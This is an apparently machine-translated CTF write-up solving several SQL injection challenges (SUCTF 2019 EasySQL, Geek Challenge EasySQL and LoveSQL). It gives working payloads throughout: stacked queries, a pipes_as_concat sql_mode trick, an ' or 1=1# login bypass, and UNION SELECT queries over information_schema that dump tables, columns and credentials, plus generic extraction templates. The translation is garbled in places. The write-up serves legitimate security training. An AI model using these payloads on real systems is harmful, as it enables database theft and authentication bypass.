1. [SUCTF 2019]EasySQL 1
-
Character and numeric injection were attempted without success.
-
Use burpSuite for blasting.
Use the SQL injection listing in the Simple List to test. Intruder usage
A manual test finds that the input number is the result of the var_dump() function.
Many keywords, such as DELETE and update, are filtered. The result is Too long, Nonono, or nothing.
The command output is as follows:
Array([0]= > 1) Copy the codeTo sum up:
- Input character string: No output is displayed, but keywords such as flag, UPDATE, and are filtered.
- Input number: There will be an array of output query results
- Input too long: error too long is reported
Search wp, say the original problem is leaked by source code, but this problem does not?? Or I didn’t find it.
Pretend you already have the original SQL statement. 🐷
$sql = "select ".$post['query']."||flag from Flag";
Copy the code- Stacked injection
The related table Flag is displayed. The CTF keyword is filtered out.
1;showdatabases; #Array([0] => 1 ) Array([0] => ctf ) Array([0] => ctftraining ) Array([0] => information_schema ) Array([0] => mysql ) Array([0] => performance_schema ) Array([0] => test )
1; use ctftraining ;showtables; #Array([0] => 1 ) Array([0] => FLAG_TABLE ) Array([0] => news ) Array([0] => users )
1; use ctf;showtables; #Array([0] => 1 ) Array([0] => Flag )
1; use ctf;show tables;select * from Flag #
Nonono.
Copy the codeKnowledge:
sql_mode
You can set SQL_mode to loose or strict to complete data verification and migration between different databases.
PIPES_AS_CONCAT (Why is there such a wonderful setting?)
Will “| |” as a connection string operator rather than the or operator, it is the same and the Oracle database, and string concatenation function Concat also similar
-
Method 1
Mysql default | | symbols according to or processing.
*.1# is equivalent tosql="select *,1 || flag from Flag";
Copy the codeWithout filtering the *, this will query the contents of the database, and then query the 1.
- Method 2
1;set sql_mode=pipes_as_concat;select 1
select 1;set sql_mode=pipes_as_concat;select 1||flag from Flag
Copy the codeThe query 1 first, and then put the | | processing according to the splicing character function, the data column 1 and flag stitching output. (Todo had better test it.)
2. Geek Challenge 2019 EasySQL 1
SQL injection occurs in the query statement
' or '1'='1
Copy the codeError, not character
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
Copy the code' or 1=1 -- '
' or 1=1#
Copy the codeThe difference between # and — is that # is commented directly, while — requires a space after the second dash.
Flag {6e0397f6-6059-41d8-b6c6-305094c1cc16}
3. Geek challenge 2019LoveSQLunfinished
Because the browser does not automatically encode the # symbol, you need to change it to %23 (URL encoding)
Determine the echo point
# determine the echo point/check.php? username=1'union select 1,2,3%23&password=1' username=1'Union select 1,2,group_concat(table_name) from information_schema.tableswhere table_schema=database()%23&password=1
# geekuser,l0ve1ysq1
Select geekuser from geekuser/check.php? username=1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser'%23&password=1 # id,username,password ' username=1'Union select 1,2,group_concat(column_name) from information_schema.columnswhere table_schema=database() and table_name='l0ve1ysq1'%23&password=1
Alter table geekuser/check.php? username=1'union select 1,2,group_concat(id,username,password) from geekuser%23&password=1 # 1 admin59598f210812a58844a52fcf4e1714ba # query l0ve1ysq1 table data/check. PHP? username=1'Union select 1,2,group_concat(id,username,password) from l0ve1ysQ1 %23&password=1# flag{9add47d1-8d6a-4b04-b78a-7143104192e6}
Copy the codeQuery template
In xmL-injected payloads, INFORMATION_SCHEMA often appears with unions
INFORMATION_SCHEMA provides access to database metadata, including MySQL server information, such as database or table names, column data types, and access permissions
Therefore, after the SQL injection vulnerability is verified, the UNION statement can be used to query the data in INFORMATION_SCHEMA and obtain other useful clues (such as all database names and table names, etc.) for further injection attacks
Query all tables in the current database
select * from Product union select group_concat(table_name),2
from information_schema.tables where table_schema=database();
Copy the codeQuery the columns in the User table
select * from Product union select group_concat(column_name),2
from information_schema.columns where table_name='User';
Copy the codeQuery the password of a User in the User table
select * from Product union select password,2
from User where user_id = 1;
Copy the codeSQL injection exercises
-
[SUCTF 2019]EasySQL 1
-
BabySQL 1
-
HardSQL 1
-
FinalSQL 1
reference
- SUCTF 2019EasySQL